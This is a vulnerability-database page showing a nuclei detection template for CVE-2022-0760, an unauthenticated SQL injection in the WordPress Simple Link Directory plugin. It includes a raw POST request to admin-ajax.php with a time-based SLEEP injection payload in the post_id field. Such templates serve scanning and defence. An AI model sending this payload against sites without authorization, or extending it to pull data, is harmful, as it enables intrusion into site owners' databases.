Lucene search
K

WordPress Simple Link Directory <7.7.2 - SQL injection

🗓️ 30 Jun 2026 04:56:11Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 35 Views

WordPress Simple Link Directory <7.7.2 - SQL injectio

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-0760
21 Mar 202219:15
attackerkb
Circl
CVE-2022-0760
21 Mar 202221:26
circl
CNNVD
WordPress plugin Simple Link Directory SQL注入漏洞
21 Mar 202200:00
cnnvd
CVE
CVE-2022-0760
21 Mar 202218:56
cve
Cvelist
CVE-2022-0760 Simple Link Directory < 7.7.2 - Unauthenticated SQL injection
21 Mar 202218:56
cvelist
NVD
CVE-2022-0760
21 Mar 202219:15
nvd
OSV
CVE-2022-0760
21 Mar 202219:15
osv
Patchstack
WordPress Simple Link Directory plugin <= 7.7.1 - Unauthenticated SQL Injection (SQLi) vulnerability
28 Feb 202200:00
patchstack
Prion
Sql injection
21 Mar 202219:15
prion
RedhatCVE
CVE-2022-0760
9 Jan 202610:45
redhatcve
Rows per page
id: CVE-2022-0760

info:
  name: WordPress Simple Link Directory <7.7.2 - SQL injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Simple Link Directory plugin before 7.7.2 contains a SQL injection vulnerability. The plugin does not validate and escape the post_id parameter before using it in a SQL statement via the qcopd_upvote_action AJAX action, available to unauthenticated and authenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the WordPress site.
  remediation: |
    Update to the latest version of WordPress Simple Link Directory plugin (7.7.2 or higher) to mitigate the SQL injection vulnerability.
  reference:
    - https://wpscan.com/vulnerability/1c83ed73-ef02-45c0-a9ab-68a3468d2210
    - https://wordpress.org/plugins/simple-link-directory/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0760
    - https://plugins.trac.wordpress.org/changeset/2684915
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0760
    cwe-id: CWE-89
    epss-score: 0.10825
    epss-percentile: 0.95295
    cpe: cpe:2.3:a:quantumcloud:simple_link_directory:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: quantumcloud
    product: simple_link_directory
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan,quantumcloud,vkev,vuln

http:
  - raw:
      - |
        @timeout 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=qcopd_upvote_action&post_id=(SELECT 3 FROM (SELECT SLEEP(7))enz)

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200 || status_code == 500'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "vote_status") || contains(body, "critical error")'
        condition: and
# digest: 4b0a00483046022100f5eba773ba599567fb93ba513544211d586f183f42de28462f9ad339a4fe84850221008526fa72a6ef3d4a5704762e4f1d171ef09f66488af252c3f44b204703a5e011:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.10825
35